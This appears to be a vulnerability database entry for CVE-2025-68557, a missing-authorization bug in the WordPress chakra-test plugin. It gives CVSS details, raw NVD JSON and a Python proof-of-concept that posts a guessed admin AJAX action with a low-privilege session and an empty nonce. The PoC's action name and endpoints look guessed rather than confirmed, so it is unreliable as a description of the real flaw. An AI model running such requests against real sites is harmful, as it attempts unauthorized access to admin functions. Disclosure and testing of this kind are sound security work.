Security Vulnerability Report
中文
CVE-2025-68557 CVSS 4.3 MEDIUM

CVE-2025-68557

Published: 2025-12-23 12:15:46
Last Modified: 2026-04-23 15:36:01

Description

Missing Authorization vulnerability in Vikas Ratudi Chakra test chakra-test allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Chakra test: from n/a through <= 1.0.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

chakra-test plugin <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68557 PoC - WordPress chakra-test Broken Access Control # This PoC demonstrates accessing admin functions without proper authorization import requests import sys TARGET_URL = "http://target-wordpress-site.com" # Identify the vulnerable endpoint based on plugin functionality VULNERABLE_ENDPOINTS = [ "/wp-admin/admin-ajax.php", "/wp-json/chakra-test/v1/*", ] def check_vulnerability(): """ Test for Missing Authorization vulnerability in chakra-test plugin. The plugin fails to properly validate user capabilities before executing actions. """ headers = { "User-Agent": "Mozilla/5.0 (CVE-2025-68557 PoC)", "Content-Type": "application/x-www-form-urlencoded" } # Low-privilege user session (subscriber/contributor role) cookies = { "wordpress_test_cookie": "WP+Cookie+check", # Add authenticated session cookie for low-privilege user } # Try to access admin-only functionality with low-privilege session payload = { "action": "chakra_test_admin_action", # Admin action without capability check "_wpnonce": "" # May not be properly validated } try: response = requests.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=payload, headers=headers, cookies=cookies, timeout=10 ) # Check if request succeeds without proper authorization if response.status_code == 200 and "success" in response.text: print(f"[+] VULNERABLE: Admin action accessible without proper authorization") print(f"[+] Response: {response.text[:500]}") return True else: print(f"[-] Not vulnerable or endpoint not found") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2025-68557 - WordPress chakra-test Missing Authorization PoC") check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68557", "sourceIdentifier": "[email protected]", "published": "2025-12-23T12:15:46.160", "lastModified": "2026-04-23T15:36:01.103", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Vikas Ratudi Chakra test chakra-test allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Chakra test: from n/a through <= 1.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/chakra-test/vulnerability/wordpress-chakra-test-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}